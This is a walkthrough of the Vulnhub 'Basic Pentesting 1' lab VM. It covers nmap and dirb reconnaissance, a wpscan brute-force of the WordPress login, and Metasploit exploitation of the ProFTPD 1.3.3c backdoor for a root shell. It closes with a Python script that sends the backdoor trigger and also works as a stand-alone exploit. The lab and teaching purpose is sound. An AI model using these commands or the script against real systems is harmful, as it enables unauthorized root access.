Basic Pentesting 1 (Vulnhub CTF Walkthrough)

Description :

This is a small boot2root VM. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. I did all of my testing for this VM on VMware.

Goal: The goal is to remotely attack the VM and gain root privileges.

Requirements :

· Install VMware or VirtualBox.

· Install a Kali Linux virtual machine in it.

· Import the Basic Pentesting 1 OVA file, which can be downloaded from here, as a second virtual machine on the same host-only network as Kali.

Now we perform enumeration.

1. Finding our target machine

arp-scan -l

arp-scan lists every host answering ARP on the local segment, so the new entry next to our own Kali address is the VM. Our target is 192.168.74.136.

2. Now use Nmap to scan the ports.

nmap -p- -A -T4 192.168.74.136

The -p- switch scans all 65535 TCP ports instead of Nmap's default top 1000; -A turns on OS detection, service version detection, the default NSE scripts and traceroute; -T4 is an aggressive timing template that is fine on a lab network.

Here, the Nmap result shows three open ports, 21, 22 and 80, running FTP, SSH and HTTP respectively. The version strings matter more than the port numbers: they are what we use to look up known vulnerabilities for each service below.

Since port 80 is open, we open the web page using the IP of our target.

The HTTP server listening on port 80 is reported by Nmap as Apache httpd 2.4.18.

3. Next we run dirb to brute-force directory and file names on the web server.

dirb http://192.168.74.136

Here dirb indicates the existence of a hidden directory at /secret/. Furthermore, the files and directories discovered beneath it (wp-content, wp-includes, wp-login.php and the like) show that /secret/ is a WordPress site.

4. Appending /secret/ to the target URL (http://192.168.74.136/secret/) brings up the hidden page.

The page renders without its styling, but it is clearly WordPress. The reason it looks broken is that WordPress links its stylesheets and scripts using the hostname configured in the site settings, vtcsec, which our Kali host cannot resolve. Add that name to the Kali hosts file so the theme assets load:

echo "192.168.74.136 vtcsec" >> /etc/hosts

This must run in a root shell: the >> redirection is performed by your own shell before echo runs, so prefixing only echo with sudo does not help.

5. Requesting the same /secret/ URL again, we now get the WordPress theme page properly rendered.

Scroll down the page until you get the link for the login.

6. Now we brute-force the WordPress login with wpscan, using the dirb big.txt wordlist for passwords.

wpscan --url http://192.168.74.136/secret/ --passwords /usr/share/wordlists/dirb/big.txt -t 2

wpscan enumerates usernames first (via the author pages and the REST API) and then tries the wordlist against each; -t 2 keeps the attack to two threads so the small VM is not overwhelmed. If user enumeration turns up nothing, pass the account explicitly with -U admin. The scan reports the weak credentials admin / admin.

Now log in at /secret/wp-login.php using admin as the username and admin as the password. Administrative access to WordPress is itself enough for code execution (the theme editor or a malicious plugin upload), but the remaining ports offer a shorter route.

There are two more ports open, so let's do a vulnerability analysis on them.

FTP

7. The Nmap version scan identified the FTP service as ProFTPD 1.3.3c. Check Exploit-DB for that version with searchsploit:

searchsploit ProFTPD 1.3.3c

1.3.3c is the release whose source tarball on the project's own distribution server was replaced with a trojaned copy in late 2010. The planted code treats a specific HELP argument as a trigger and hands the control connection to a shell while the daemon is still running as root. Metasploit has a module for it, exploit/unix/ftp/proftpd_133c_backdoor, so we do not need to craft the trigger by hand.

8. Use Metasploit to exploit the FTP service.

First start the console with the command:

msfconsole

9. Then search the console for proftpd 1.3.3c.

The search returns the backdoor module listed above. The next step is to select it with use.

10. Check the module's options with show options. Only the remote host is required; the module picks a default command payload for the shell it receives.

11. Now set the target IP as the remote host (recent Metasploit releases name this option RHOSTS; set whichever the options table shows):

set RHOST 192.168.74.136

12. Now we run exploit. The module sends the trigger, and the session that opens is the shell spawned by the backdoored daemon.

13. The session is a bare command shell with no TTY. Run the following command inside it to get a proper interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Running id confirms uid=0: because ProFTPD has not yet dropped privileges when the backdoor fires, the shell is root from the start, so our goal is achieved without touching SSH or any of the VM's intended privilege escalation paths.
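The same trigger can be checked without Metasploit, which is useful when you want to confirm a finding or scan a range of hosts for the trojaned build. The script below is an added example, not part of the original walkthrough or of any tool it mentions: it opens the FTP control connection, sends the HELP trigger followed by id, and decides from the reply whether a root shell answered or a normal FTP error came back. Because this must run offline, it also includes a constructed stand-in server that mimics both a trojaned and a clean ProFTPD 1.3.3c; the 127.0.0.1 port and the reply strings are part of that simulation, not captured from the VM.

```python
"""Manual probe for the trojaned ProFTPD 1.3.3c build.

Added example, not code from the walkthrough. The trojaned 1.3.3c source treats
"HELP ACIDBITCHEZ" as a trigger: the daemon, still running as root, attaches
/bin/sh to the control connection. A clean ProFTPD answers the same command with
an ordinary 502 reply, so the difference is visible in the first response.
"""
import socket
import threading

TRIGGER = b"HELP ACIDBITCHEZ\r\n"   # the backdoor's magic HELP argument
PROBE = b"id\n"                      # first command fed to the shell, if one is attached


def recv_until_quiet(sock, timeout):
    """Read until the peer closes or stays silent for `timeout` seconds.

    A backdoored server gives a raw shell with no prompt, so there is no
    terminator to look for; silence or EOF is the only end-of-output signal.
    """
    sock.settimeout(timeout)
    chunks = []
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    except socket.timeout:
        pass
    return b"".join(chunks)


def probe_proftpd_backdoor(host, port=21, timeout=3.0):
    """Return (banner, response) for the HELP ACIDBITCHEZ + id exchange."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        banner = sock.recv(1024)          # e.g. "220 ProFTPD 1.3.3c Server ..."
        sock.sendall(TRIGGER)
        sock.sendall(PROBE)               # harmless on a clean server (500 reply)
        response = recv_until_quiet(sock, timeout)
    return banner, response


def looks_backdoored(response):
    """The backdoor shell runs as root, so `id` reports uid=0; a clean daemon
    answers with numeric FTP reply codes instead."""
    return b"uid=0(" in response


# --- constructed stand-in for the target, so the probe can be exercised offline ---
def start_fake_proftpd(backdoored):
    """Listen on an ephemeral loopback port and mimic either the trojaned or a
    clean ProFTPD 1.3.3c control channel. Returns the port number (simulation only)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(b"220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [127.0.0.1]\r\n")
            data = b""
            while data.count(b"\n") < 2:      # wait for both TRIGGER and PROBE
                chunk = conn.recv(1024)
                if not chunk:
                    return
                data += chunk
            if backdoored and data.startswith(TRIGGER):
                # the real backdoor gives a root shell; `id` output is what we would see
                conn.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")
            else:
                conn.sendall(b"502 Unknown command 'ACIDBITCHEZ'\r\n"
                             b"500 ID not understood\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    for flag in (True, False):
        port = start_fake_proftpd(backdoored=flag)
        banner, response = probe_proftpd_backdoor("127.0.0.1", port, timeout=1.0)
        print(banner.decode(errors="replace").strip())
        verdict = "BACKDOORED" if looks_backdoored(response) else "clean"
        print(f"port {port}: {verdict} -> {response!r}")
```

Against the real VM, call probe_proftpd_backdoor("192.168.74.136") and check looks_backdoored on the result; the timeout is what ends the read on a clean server, since a real daemon keeps the control connection open after its 502 and 500 replies. Note that on a trojaned host the probe is already the exploit: sending the trigger spawns the root shell, so only run it against systems you are authorised to test.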